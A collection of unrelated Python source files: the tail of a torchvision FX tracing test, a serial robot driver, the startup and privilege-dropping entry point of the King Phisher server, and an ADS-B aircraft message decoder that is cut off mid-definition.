    # Models known to fail symbolic tracing (detection heads iterate Proxies).
    UNTRACEABLE_MODELS = {
        "fasterrcnn_resnet50_fpn": PROXY_ITERATED,
        "fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
        "fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
        "maskrcnn_resnet50_fpn": PROXY_ITERATED,
        "keypointrcnn_resnet50_fpn": PROXY_ITERATED,
        "retinanet_resnet50_fpn": PROXY_ITERATED,
    }
    # Models that trace fine but whose GraphModule cannot be scripted.
    UNSCRIPTABLE_MODELS = {
        "googlenet": INCONSISTENT_TYPE,
        "inception_v3": INCONSISTENT_TYPE,
    }

    # Per-model adapters that project structured outputs (dicts / tuples)
    # down to a comparable Tensor; default is the identity.
    output_transform = {
        "fcn_resnet50": lambda x: x["out"],
        "fcn_resnet101": lambda x: x["out"],
        "deeplabv3_resnet50": lambda x: x["out"],
        "deeplabv3_resnet101": lambda x: x["out"],
        "deeplabv3_mobilenet_v3_large": lambda x: x["out"],
        "lraspp_mobilenet_v3_large": lambda x: x["out"],
        "fasterrcnn_resnet50_fpn": lambda x: x[1],
        "fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
        "fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
        "maskrcnn_resnet50_fpn": lambda x: x[1],
        "keypointrcnn_resnet50_fpn": lambda x: x[1],
        "retinanet_resnet50_fpn": lambda x: x[1],
    }

    @classmethod
    def generate_test_fn(cls, name, model_fn, x, kwargs):
        """Build one test closure for model `name`, constructor `model_fn`,
        sample input `x` and constructor kwargs `kwargs`."""
        def run_test(self):
            model = model_fn(**kwargs)
            model = model.eval()
            if name in self.UNTRACEABLE_MODELS:
                # NOTE(review): the local names are swapped relative to the
                # tuple layout (exception, regex) — harmless, since they are
                # passed positionally in the correct order below.
                err, exc = self.UNTRACEABLE_MODELS[name]
                with self.assertRaisesRegex(err, exc):
                    graph = symbolic_trace(model)
            else:
                out_transform = self.output_transform.get(name, lambda x: x)
                graph : torch.fx.GraphModule = symbolic_trace(model)
                a = out_transform(model(x))
                b = out_transform(graph(x))
                # Traced module must reproduce eager outputs exactly.
                self.assertEqual(a, b)

                if name in self.UNSCRIPTABLE_MODELS:
                    err, exc = self.UNSCRIPTABLE_MODELS[name]
                    with self.assertRaisesRegex(err, exc):
                        script = torch.jit.script(graph)
                else:
                    script = torch.jit.script(graph)
                    c = out_transform(script(x))
                    # Scripted-traced module must also match eager outputs.
                    self.assertEqual(a, c)
        return run_test

    @classmethod
    def generate_classification_tests(cls):
        # Public lowercase callables in torchvision.models are model builders.
        for k, v in torchvision_models.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_' + k
                # inception_v3 requires 299x299 inputs; others use 224x224.
                x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
                kwargs = dict(num_classes=50)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_segmentation_tests(cls):
        for k, v in torchvision_models.segmentation.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_segmentation_' + k
                x = torch.rand(1, 3, 32, 32)
                kwargs = dict(num_classes=10, pretrained_backbone=False)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_detection_tests(cls):
        for k, v in torchvision_models.detection.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_detection_' + k
                # Detection models take a list of image tensors.
                x = [torch.rand(3, 300, 300)]
                kwargs = dict(num_classes=10, pretrained_backbone=False)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_video_tests(cls):
        for k, v in torchvision_models.video.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_video_' + k
                # Video models expect (batch, channels, frames, H, W).
                x = torch.rand(1, 3, 4, 112, 112)
                kwargs = dict(num_classes=50)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_tests(cls):
        cls.generate_classification_tests()
        cls.generate_detection_tests()
        cls.generate_segmentation_tests()
        cls.generate_video_tests()

if HAS_TORCHVISION:
    TestVisionTracing.generate_tests()

if __name__ == '__main__':
    run_tests()
robot.py
from transport import Transport
from protocol import *
import threading
from config import*
from messages import*
from time import time as now, sleep
import yaml


class RobotStatus:
    """Container for the most recent state reported by the robot."""

    def __init__(self, num_joints):
        # Last joint positions received from the hardware (project type).
        self.current_joint_positions = JointPos().resize(num_joints)


class Robot:
    """Serial robot driver.

    Lifecycle: configure() -> initialize() -> start(); a daemon thread then
    pumps bytes from the transport through the protocol parser.
    """

    def __init__(self):
        self.name = None
        self.__protocol = Protocol()
        self.__shutdown = False
        self.__initialized = False
        self.__configured = False
        self.__waiting_for = None  # MsgId currently awaited, or None

    def configure(self, name, port, baudrate):
        """Load config/<name>.yaml and record serial settings.

        Returns True on success, False if the file is missing or invalid.
        """
        self.name = name
        config_file = 'config/' + self.name + '.yaml'
        try:
            # `with` closes the file; the old explicit f.close() was redundant.
            with open(config_file) as f:
                conf = yaml.safe_load(f)
            self.__port = port
            self.__baudrate = baudrate
            self.__num_joints = len(conf['Joints'])
        except (OSError, yaml.YAMLError, KeyError, TypeError):
            # Narrowed from a bare `except:` so KeyboardInterrupt and genuine
            # programming errors are no longer silently swallowed.
            print("[Error] Configuration failed. \n ***** Please make sure " + self.name + ".yaml exists.")
            return False
        self.__configured = True
        return True

    def initialize(self):
        """Open the serial transport and prepare the reader thread.

        Returns True on success, False on configuration/serial failure.
        """
        if not self.__configured:
            print('[Error] Robot has not been configured.')
            return False
        try:
            self.__transport = Transport(self.__port, self.__baudrate)
        except Exception:
            # Transport's failure type is not visible here; Exception (not a
            # bare except) still lets KeyboardInterrupt/SystemExit propagate.
            print("[Error] Serial initialization failed. \n ***** Check serial settings.")
            return False
        # daemon=True in the constructor replaces the deprecated setDaemon().
        self.__proc = threading.Thread(
            name='robot process', target=self.__run, daemon=True
        )
        self.robot_status = RobotStatus(self.__num_joints)
        self.__initialized = True
        return True

    def start(self):
        """Start the background reader thread (after initialize())."""
        if not self.__initialized:
            print("Error: Robot has not been initialized.")
            return
        self.__proc.start()

    def shutdown(self):
        """Request the reader loop to exit and wait briefly for it."""
        self.__shutdown = True  # set shutdown flag
        # Join so callers can rely on the thread being stopped; is_alive()
        # is False for a never-started thread, so join() is safe to skip.
        if self.__initialized and self.__proc.is_alive():
            self.__proc.join(timeout=1.0)

    def get_joint_angles(self):
        """Request joint angles and block (<=0.5s) for the reply.

        Returns the angles list, or False on timeout.
        """
        self.__set_wait(MsgId.RET_JOINT_POSITIONS)
        self.__transport.write(self.__protocol.encode(MsgId.GET_JOINT_POSITIONS, Empty()))
        if self.__wait():
            return self.robot_status.current_joint_positions.angles
        return False

    def set_joint_angles(self, angles):
        """Send a joint-position command; fire-and-forget (no ack wait)."""
        print("setting joint angles at ", angles)
        msg = JointPos().resize(self.__num_joints)
        for i in range(self.__num_joints):
            msg.angles[i] = angles[i]
        self.__transport.write(self.__protocol.encode(MsgId.SET_JOINT_POSITIONS, msg))

    def __run(self):
        # Reader loop: feed one byte at a time into the protocol parser and
        # dispatch complete messages.
        while not self.__shutdown:
            c = self.__transport.read()
            if self.__protocol.parse(c):
                self.__process_message(self.__protocol.get_message())

    def __process_message(self, msg_id):
        """Decode an incoming message and release any matching waiter."""
        if msg_id == MsgId.MOVE_DONE:
            pass
        elif msg_id == MsgId.RET_JOINT_POSITIONS:
            self.__protocol.decode(msg_id, self.robot_status.current_joint_positions)
            if self.__waiting_for == MsgId.RET_JOINT_POSITIONS:
                self.__waiting_for = None

    def __set_wait(self, msg_id):
        # Must be set BEFORE writing the request, or the reply could race us.
        self.__waiting_for = msg_id

    def __wait(self, timeout=0.5):
        """Poll until the awaited reply arrives; True on success."""
        deadline = now() + timeout
        while now() < deadline:
            if self.__waiting_for is None:
                return True
            sleep(0.001)  # yield the CPU instead of busy-spinning
        # Clear the stale flag so a late reply cannot satisfy a future wait.
        self.__waiting_for = None
        return False
__main__.py
# -*- coding: utf-8 -*- # # king_phisher/server/__main__.py # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
#
# pylint: disable=too-many-locals

import argparse
import functools
import logging
import os
import signal
import sys
import threading

from king_phisher import startup
from king_phisher import color
from king_phisher import constants
from king_phisher import errors
from king_phisher import find
from king_phisher import geoip
from king_phisher import utilities
from king_phisher import version
from king_phisher.server import build
from king_phisher.server import configuration
from king_phisher.server import fs_utilities
from king_phisher.server import plugins
from king_phisher.server import pylibc

from boltons import strutils

logger = logging.getLogger('KingPhisher.Server.CLI')

def sig_handler(server, name, number, frame):
    """Signal handler: ignore further INT/TERM and shut the server down
    from a separate thread (shutdown may block; handlers must not).
    """
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    signal.signal(signal.SIGTERM, signal.SIG_IGN)
    logger.info("received signal {0}, shutting down the server".format(name))
    threading.Thread(target=server.shutdown).start()

def build_and_run(arguments, config, plugin_manager, log_file=None):
    """Build the server from *config*, drop privileges if configured,
    and serve until interrupted. Returns an ``os.EX_*`` exit code.
    """
    # fork into the background unless --foreground or server.fork says not to
    should_fork = True
    if arguments.foreground:
        should_fork = False
    elif config.has_option('server.fork'):
        should_fork = bool(config.get('server.fork'))
    if should_fork:
        if os.fork():
            # parent exits immediately; the child continues as the daemon
            return sys.exit(os.EX_OK)
        os.setsid()
    try:
        king_phisher_server = build.server_from_config(config, plugin_manager=plugin_manager)
    except errors.KingPhisherDatabaseAuthenticationError:
        logger.critical('failed to authenticate to the database, this usually means the password is incorrect and needs to be updated')
        return os.EX_SOFTWARE
    except errors.KingPhisherError as error:
        logger.critical('server failed to build with error: ' + error.message)
        return os.EX_SOFTWARE

    server_pid = os.getpid()
    logger.info("server running in process: {0} main tid: 0x{1:x}".format(server_pid, threading.current_thread().ident))

    # write the pid file only after forking so it records the daemon's pid
    if should_fork and config.has_option('server.pid_file'):
        pid_file = open(config.get('server.pid_file'), 'w')
        pid_file.write(str(server_pid))
        pid_file.close()

    if config.has_option('server.setuid_username'):
        setuid_username = config.get('server.setuid_username')
        try:
            passwd = pylibc.getpwnam(setuid_username)
        except KeyError:
            logger.critical('an invalid username was specified as \'server.setuid_username\'')
            king_phisher_server.shutdown()
            return os.EX_NOUSER
        # chown files the unprivileged user must still write, BEFORE dropping
        if log_file is not None:
            fs_utilities.chown(log_file, user=passwd.pw_uid, group=passwd.pw_gid, recursive=False)
        data_path = config.get_if_exists('server.letsencrypt.data_path')
        if data_path and config.get_if_exists('server.letsencrypt.chown_data_path', True):
            if os.path.isdir(data_path):
                fs_utilities.chown(data_path, user=passwd.pw_uid, group=passwd.pw_gid, recursive=True)
            else:
                logger.warning('can not chown the letsencrypt data directory (directory not found)')
        # order matters: groups, then gid, then uid (uid last or we lose the
        # privilege needed for the first two calls)
        os.setgroups(pylibc.getgrouplist(setuid_username))
        os.setresgid(passwd.pw_gid, passwd.pw_gid, passwd.pw_gid)
        os.setresuid(passwd.pw_uid, passwd.pw_uid, passwd.pw_uid)
        logger.info("dropped privileges to the {} account (uid: {}, gid: {})".format(setuid_username, passwd.pw_uid, passwd.pw_gid))
    else:
        logger.warning('running with root privileges is dangerous, drop them by configuring \'server.setuid_username\'')
    os.umask(0o077)  # newly created files are owner-only

    db_engine_url = king_phisher_server.database_engine.url
    if db_engine_url.drivername == 'sqlite':
        logger.warning('sqlite is no longer fully supported, see https://github.com/securestate/king-phisher/wiki/Database#sqlite for more details')
        database_dir = os.path.dirname(db_engine_url.database)
        if not os.access(database_dir, os.W_OK):
            # sqlite needs to create journal files next to the database
            logger.critical('sqlite requires write permissions to the folder containing the database')
            king_phisher_server.shutdown()
            return os.EX_NOPERM

    signal.signal(signal.SIGHUP, functools.partial(sig_handler, king_phisher_server, 'SIGHUP'))
    signal.signal(signal.SIGINT, functools.partial(sig_handler, king_phisher_server, 'SIGINT'))
    signal.signal(signal.SIGTERM, functools.partial(sig_handler, king_phisher_server, 'SIGTERM'))
    try:
        king_phisher_server.serve_forever(fork=False)
    except KeyboardInterrupt:
        pass
    king_phisher_server.shutdown()
    return os.EX_OK

def _ex_config_logging(arguments, config, console_handler):
    """
    If a setting is configured improperly, this will terminate execution via
    :py:func:`sys.exit`.

    :return: The path to a log file if one is in use.
    :rtype: str
    """
    # effective level is the more verbose of CLI flag and config file
    default_log_level = min(
        getattr(logging, (arguments.loglvl or constants.DEFAULT_LOG_LEVEL)),
        getattr(logging, config.get_if_exists('logging.level', 'critical').upper())
    )
    log_levels = ('DEBUG', 'INFO', 'WARNING', 'ERROR', 'FATAL')
    file_path = None
    if config.has_option('logging.file'):
        options = config.get('logging.file')
        # single-iteration loop used as a poor-man's goto so `break` can
        # abort option parsing early
        for _ in range(1):
            default_format = '%(asctime)s %(name)-50s %(levelname)-8s %(message)s'
            if isinstance(options, dict):  # new style
                if not options.get('enabled', True):
                    break
                if 'path' not in options:
                    color.print_error('logging.file is missing required key \'path\'')
                    sys.exit(os.EX_CONFIG)
                if 'level' not in options:
                    color.print_error('logging.file is missing required key \'level\'')
                    sys.exit(os.EX_CONFIG)
                file_path = options['path']
                formatter = logging.Formatter(options.get('format', default_format))
                if not options['level'].upper() in log_levels:
                    color.print_error('logging.file.level is invalid, must be one of: ' + ', '.join(log_levels))
                    sys.exit(os.EX_CONFIG)
                log_level = getattr(logging, options['level'].upper())
                root = options.get('root', '')
            elif isinstance(options, str):  # old style
                file_path = options
                formatter = logging.Formatter(default_format)
                log_level = default_log_level
                root = ''
            else:
                break
            file_handler = logging.FileHandler(file_path)
            file_handler.setFormatter(formatter)
            logging.getLogger(root).addHandler(file_handler)
            file_handler.setLevel(log_level)
    if config.has_option('logging.console'):
        options = config.get('logging.console')
        for _ in range(1):
            if isinstance(options, dict):  # new style
                if not options.get('enabled', True):
                    break
                if 'format' in options:
                    console_handler.setFormatter(color.ColoredLogFormatter(options['format']))
                # CLI --loglvl takes precedence over the config console level
                if arguments.loglvl is None and 'level' in options:
                    log_level = str(options.get('level', '')).upper()
                    if log_level not in log_levels:
                        color.print_error('logging.console.level is invalid, must be one of: ' + ', '.join(log_levels))
                        sys.exit(os.EX_CONFIG)
                    console_handler.setLevel(getattr(logging, log_level))
            elif isinstance(options, str):  # old style
                console_handler.setLevel(default_log_level)
    return file_path

def main():
    """CLI entry point: parse arguments, validate the config file, set up
    logging and plugins, then delegate to :py:func:`build_and_run`.
    """
    parser = argparse.ArgumentParser(prog='KingPhisherServer', description='King Phisher Server', conflict_handler='resolve')
    utilities.argp_add_args(parser)
    startup.argp_add_server(parser)
    arguments = parser.parse_args()

    # basic runtime checks
    if sys.version_info < (3, 4):
        color.print_error('the python version is too old (minimum required is 3.4)')
        return 0

    console_log_handler = utilities.configure_stream_logger(arguments.logger, arguments.loglvl)
    del parser

    # configure environment variables and load the config
    find.init_data_path('server')
    if not os.path.exists(arguments.config_file):
        color.print_error('invalid configuration file')
        color.print_error('the specified path does not exist')
        return os.EX_NOINPUT
    if not os.path.isfile(arguments.config_file):
        color.print_error('invalid configuration file')
        color.print_error('the specified path is not a file')
        return os.EX_NOINPUT
    if not os.access(arguments.config_file, os.R_OK):
        color.print_error('invalid configuration file')
        color.print_error('the specified path can not be read')
        return os.EX_NOPERM
    config = configuration.ex_load_config(arguments.config_file)
    if arguments.verify_config:
        color.print_good('configuration verification passed')
        color.print_good('all required settings are present')
        return os.EX_OK
    if config.has_option('server.data_path'):
        find.data_path_append(config.get('server.data_path'))

    # root is required to bind low ports and to later drop privileges
    if os.getuid():
        color.print_error('the server must be started as root, configure the')
        color.print_error('\'server.setuid_username\' option in the config file to drop privileges')
        return os.EX_NOPERM

    if arguments.update_geoip_db:
        color.print_status('downloading a new geoip database')
        try:
            size = geoip.download_geolite2_city_db(config.get('server.geoip.database'))
        except errors.KingPhisherResourceError as error:
            color.print_error(error.message)
            return os.EX_UNAVAILABLE
        color.print_good("download complete, file size: {0}".format(strutils.bytes2human(size)))
        return os.EX_OK

    # setup logging based on the configuration
    if config.has_section('logging'):
        log_file = _ex_config_logging(arguments, config, console_log_handler)
    logger.debug("king phisher version: {0} python version: {1}.{2}.{3}".format(version.version, sys.version_info[0], sys.version_info[1], sys.version_info[2]))

    # initialize the plugin manager
    try:
        plugin_manager = plugins.ServerPluginManager(config)
    except errors.KingPhisherError as error:
        if isinstance(error, errors.KingPhisherPluginError):
            color.print_error("plugin error: {0} ({1})".format(error.plugin_name, error.message))
        else:
            color.print_error(error.message)
        return os.EX_SOFTWARE

    status_code = build_and_run(arguments, config, plugin_manager, log_file)
    plugin_manager.shutdown()
    logging.shutdown()
    return status_code

if __name__ == '__main__':
    sys.exit(main())
decode.py
# fmt: off
import os
import socket
import threading
import warnings
from collections import UserDict
from datetime import datetime, timedelta, timezone
from operator import itemgetter
from pathlib import Path

import pkg_resources
import pandas as pd
import pyModeS as pms
from tqdm.autonotebook import tqdm

from typing import (Any, Dict, Iterable, Iterator, List, Optional, TextIO,
                    Tuple, Union, cast)

from ...core import Flight, Traffic
from ...data.basic.airport import Airport
from ...drawing.ipywidgets import TrafficWidget

# fmt: on

if pkg_resources.get_distribution("pyModeS").version < "2.0":
    warnings.warn("Install pyModeS>=2.0 from https://github.com/junzis/pyModeS")


class StoppableThread(threading.Thread):
    """Thread class with a stop() method. The thread itself has to check
    regularly for the to_be_stopped() condition."""

    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        self.daemon = True  # is it redundant?
        self._stop_event = threading.Event()

    def stop(self) -> None:
        # Cooperative stop: the target must poll to_be_stopped().
        self._stop_event.set()

    def to_be_stopped(self) -> bool:
        return self._stop_event.is_set()


class Aircraft(object):
    """Per-aircraft decoding state. Decoded fields are appended to `cumul`
    (a list of row dicts) under `lock`, then drained by the `flight` property.
    The property setters below are used as message sinks: `ac.speed = (t, msg)`
    decodes `msg` and records the result.
    """

    def __init__(self, icao24: str, lat0: float, lon0: float) -> None:
        self.icao24 = icao24
        self._callsign: Optional[str] = None
        self._flight: Optional[Flight] = None
        self.cumul: List[Dict] = []  # decoded rows not yet folded into _flight

        # t0/m0, t1/m1: latest even/odd CPR position messages (for pairing)
        self.t0: Optional[datetime] = None
        self.t1: Optional[datetime] = None
        self.tpos: Optional[datetime] = None  # time of last decoded position

        self.m0: Optional[str] = None
        self.m1: Optional[str] = None

        # latest decoded state vector
        self.lat: Optional[float] = None
        self.lon: Optional[float] = None
        self.alt: Optional[float] = None
        self.trk: Optional[float] = None
        self.spd: Optional[float] = None

        # reference position for CPR local decoding
        self.lat0: float = lat0
        self.lon0: float = lon0

        self.lock = threading.Lock()

    @property
    def flight(self) -> Optional[Flight]:
        """Drain `cumul` into a Flight, merging with what was built before."""
        with self.lock:  # access then clear not thread-safe, hence the lock
            df = pd.DataFrame.from_records(self.cumul)
            self.cumul.clear()

        if self._flight is not None:
            df = pd.concat([self._flight.data, df], sort=False)

        if len(df) == 0:
            return None

        # forward/back-fill the callsign so every row carries one
        self._flight = Flight(
            df.assign(
                callsign=df.callsign.replace("", None)
                .fillna(method="ffill")
                .fillna(method="bfill")
            )
        )
        return self._flight

    @property
    def callsign(self):
        return self._callsign

    @callsign.setter
    def callsign(self, args):
        # args is (timestamp, raw ADS-B identification message)
        t, msg = args
        callsign = pms.adsb.callsign(msg).strip("_")
        if callsign == "":
            return
        self._callsign = callsign
        with self.lock:
            self.cumul.append(
                dict(timestamp=t, icao24=self.icao24, callsign=self._callsign)
            )

    @property
    def speed(self):
        pass

    @speed.setter
    def speed(self, args):
        # Decode an airborne velocity message (typecode 19).
        t, msg = args
        vdata = pms.adsb.velocity(msg)
        if vdata is None:
            return

        spd, trk, roc, tag = vdata
        if tag != "GS":  # does it ever happen...
            return
        if (spd is None) or (trk is None):
            return

        self.spd = spd
        self.trk = trk
        # difference between GNSS and barometric altitude, if present
        delta = pms.adsb.altitude_diff(msg)

        with self.lock:
            self.cumul.append(
                dict(
                    timestamp=t,
                    icao24=self.icao24,
                    groundspeed=spd,
                    track=trk,
                    vertical_rate=roc,
                )
            )
            if delta is not None and self.alt is not None:
                self.cumul[-1]["geoaltitude"] = self.alt + delta

    @property
    def position(self):
        pass

    @position.setter
    def position(self, args):
        # Decode an airborne position message via CPR even/odd pairing.
        t, msg = args
        oe = pms.adsb.oe_flag(msg)
        # stash the frame under m0/t0 (even) or m1/t1 (odd)
        setattr(self, "m" + str(oe), msg)
        setattr(self, "t" + str(oe), t)

        # global decoding needs an even/odd pair less than 10 s apart
        if (
            self.t0 is not None
            and self.t1 is not None
            and abs((self.t0 - self.t1).total_seconds()) < 10
        ):
            latlon = pms.adsb.position(
                self.m0, self.m1, self.t0, self.t1, self.lat0, self.lon0
            )
        else:
            latlon = None

        if latlon is not None:
            self.tpos = t
            self.lat, self.lon = latlon
            self.alt = pms.adsb.altitude(msg)
            with self.lock:
                self.cumul.append(
                    dict(
                        timestamp=t,
                        icao24=self.icao24,
                        latitude=self.lat,
                        longitude=self.lon,
                        altitude=self.alt,
                        onground=False,
                    )
                )

    @property
    def surface(self):
        pass

    @surface.setter
    def surface(self, args):
        # Surface position (typecodes 5-8): decoded against the receiver
        # reference, no even/odd pairing needed.
        t, msg = args
        self.lat, self.lon = pms.adsb.surface_position_with_ref(
            msg, self.lat0, self.lon0
        )
        with self.lock:
            self.cumul.append(
                dict(
                    timestamp=t,
                    icao24=self.icao24,
                    latitude=self.lat,
                    longitude=self.lon,
                    onground=True,
                )
            )

    @property
    def altcode(self):
        pass

    @altcode.setter
    def altcode(self, args):
        # Mode S altitude reply (DF 4 or 20).
        t, msg = args
        self.alt = pms.common.altcode(msg)
        with self.lock:
            self.cumul.append(
                dict(timestamp=t, icao24=self.icao24, altitude=self.alt)
            )

    @property
    def idcode(self):
        pass

    @idcode.setter
    def idcode(self, args):
        # Mode S identity reply (DF 5 or 21): squawk code.
        t, msg = args
        with self.lock:
            self.cumul.append(
                dict(
                    timestamp=t,
                    icao24=self.icao24,
                    squawk=pms.common.idcode(msg),
                )
            )

    @property
    def bds20(self):
        pass

    @bds20.setter
    def bds20(self, args):
        # Comm-B BDS 2,0: aircraft identification.
        t, msg = args
        callsign = pms.commb.cs20(msg).strip("_")
        if callsign == "":
            return
        self._callsign = callsign
        with self.lock:
            # in case altitude was already included from altcode (DF 4 or 20)
            # or squawk from idcode (DF5 or 21)
            last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
            if last_entry is not None and last_entry["timestamp"] == t:
                self.cumul[-1] = dict(**last_entry, callsign=self._callsign)
            else:
                self.cumul.append(
                    dict(
                        timestamp=t, icao24=self.icao24, callsign=self._callsign
                    )
                )

    @property
    def bds40(self):
        pass

    @bds40.setter
    def bds40(self, args):
        # Comm-B BDS 4,0: selected vertical intention (FMS/MCP altitudes).
        t, msg = args
        with self.lock:
            # in case altitude was already included from altcode (DF 4 or 20)
            # or squawk from idcode (DF5 or 21)
            last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
            if last_entry is not None and last_entry["timestamp"] == t:
                self.cumul[-1] = dict(
                    **last_entry,
                    selected_fms=pms.commb.alt40fms(msg),
                    selected_mcp=pms.commb.alt40mcp(msg),
                    barometric_setting=pms.commb.p40baro(msg),
                )
            else:
                self.cumul.append(
                    dict(
                        timestamp=t,
                        icao24=self.icao24,
                        selected_fms=pms.commb.alt40fms(msg),
                        selected_mcp=pms.commb.alt40mcp(msg),
                        barometric_setting=pms.commb.p40baro(msg),
                    )
                )

    @property
    def bds44(self):
        pass

    @bds44.setter
    def bds44(self, args):
        # Comm-B BDS 4,4: meteorological routine air report.
        t, msg = args
        wind = pms.commb.wind44(msg)
        wind = wind if wind is not None else (None, None)
        with self.lock:
            # in case altitude was already included from altcode (DF 4 or 20)
            # or squawk from idcode (DF5 or 21)
            last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
            if last_entry is not None and last_entry["timestamp"] == t:
                self.cumul[-1] = dict(
                    **last_entry,
                    humidity=pms.commb.hum44(msg),
                    pression=pms.commb.p44(msg),
                    temperature=pms.commb.temp44(msg),
                    windspeed=wind[0],
                    winddirection=wind[1],
                )
            else:
                self.cumul.append(
                    dict(
                        timestamp=t,
                        icao24=self.icao24,
                        humidity=pms.commb.hum44(msg),
                        pression=pms.commb.p44(msg),
                        temperature=pms.commb.temp44(msg),
                        windspeed=wind[0],
                        winddirection=wind[1],
                    )
                )

    @property
    def bds50(self):
        pass

    @bds50.setter
    def bds50(self, args):
        # Comm-B BDS 5,0: track and turn report.
        t, msg = args
        with self.lock:
            # in case altitude was already included from altcode (DF 4 or 20)
            # or squawk from idcode (DF5 or 21)
            last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
            if last_entry is not None and last_entry["timestamp"] == t:
                self.cumul[-1] = dict(
                    **last_entry,
                    groundspeed=pms.commb.gs50(msg),
                    roll=pms.commb.roll50(msg),
                    tas=pms.commb.tas50(msg),
                    track=pms.commb.trk50(msg),
                    track_rate=pms.commb.rtrk50(msg),
                )
            else:
                self.cumul.append(
                    dict(
                        timestamp=t,
                        icao24=self.icao24,
                        groundspeed=pms.commb.gs50(msg),
                        roll=pms.commb.roll50(msg),
                        tas=pms.commb.tas50(msg),
                        track=pms.commb.trk50(msg),
                        track_rate=pms.commb.rtrk50(msg),
                    )
                )

    @property
    def bds60(self):
        pass

    @bds60.setter
    def bds60(self, args):
        # Comm-B BDS 6,0: heading and speed report.
        t, msg = args
        with self.lock:
            # in case altitude was already included from altcode (DF 4 or 20)
            # or squawk from idcode (DF5 or 21)
            last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
            if last_entry is not None and last_entry["timestamp"] == t:
                self.cumul[-1] = dict(
                    **last_entry,
                    ias=pms.commb.ias60(msg),
                    heading=pms.commb.hdg60(msg),
                    mach=pms.commb.mach60(msg),
                    vertical_rate_barometric=pms.commb.vr60baro(msg),
                    vertical_rate_inertial=pms.commb.vr60ins(msg),
                )
            else:
                self.cumul.append(
                    dict(
                        timestamp=t,
                        icao24=self.icao24,
                        ias=pms.commb.ias60(msg),
                        heading=pms.commb.hdg60(msg),
                        mach=pms.commb.mach60(msg),
                        vertical_rate_barometric=pms.commb.vr60baro(msg),
                        vertical_rate_inertial=pms.commb.vr60ins(msg),
                    )
                )


class AircraftDict(UserDict):
    """icao24 -> Aircraft map that lazily creates entries with the current
    reference position."""

    lat0: float
    lon0: float

    def __missing__(self, key):
        self[key] = value = Aircraft(key, self.lat0, self.lon0)
        return value

    def set_latlon(self, lat0, lon0):
        # Propagate a new reference position to all tracked aircraft.
        self.lat0 = lat0
        self.lon0 = lon0
        for ac in self.values():
            ac.lat0 = lat0
            ac.lon0 = lon0


class Decoder:
    """Mode S / ADS-B decoder fed from a file, a raw Beast socket or
    dump1090, keyed on a reference position (for CPR decoding)."""

    thread: Optional[StoppableThread]

    def __init__(
        self, reference: Union[str, Airport, Tuple[float, float]]
    ) -> None:
        # reference may be an airport name, an Airport, or a (lat, lon) pair
        if isinstance(reference, str):
            from ...data import airports

            reference = airports[reference]

        if isinstance(reference, Airport):
            lat0, lon0 = reference.lat, reference.lon
        else:
            lat0, lon0 = cast(Tuple[float, float], reference)

        self.acs = AircraftDict()
        self.acs.set_latlon(lat0, lon0)
        self.thread = None

    @classmethod
    def from_file(
        cls,
        filename: Union[str, Path],
        reference: Union[str, Airport, Tuple[float, float]],
    ) -> "Decoder":
        """Replay a CSV dump of `timestamp,rawmsg` lines (as written by
        from_socket) through a fresh decoder."""
        if isinstance(filename, str):
            filename = Path(filename)
        with filename.open("r") as fh:
            all_lines = fh.readlines()
            decoder = cls(reference)
            decoder.process_msgs(
                list(
                    (
                        datetime.fromtimestamp(
                            float(line.strip().split(",")[0])
                        ),
                        # [18:] strips the Beast framing prefix of the hex dump
                        cast(str, line.strip().split(",")[1][18:]),
                    )
                    for line in all_lines
                )
            )
            return decoder

    @classmethod
    def from_socket(
        cls,
        socket: socket.socket,
        reference: Union[str, Airport, Tuple[float, float]],
        dump1090: bool = False,
        fh: Optional[TextIO] = None,
    ) -> "Decoder":
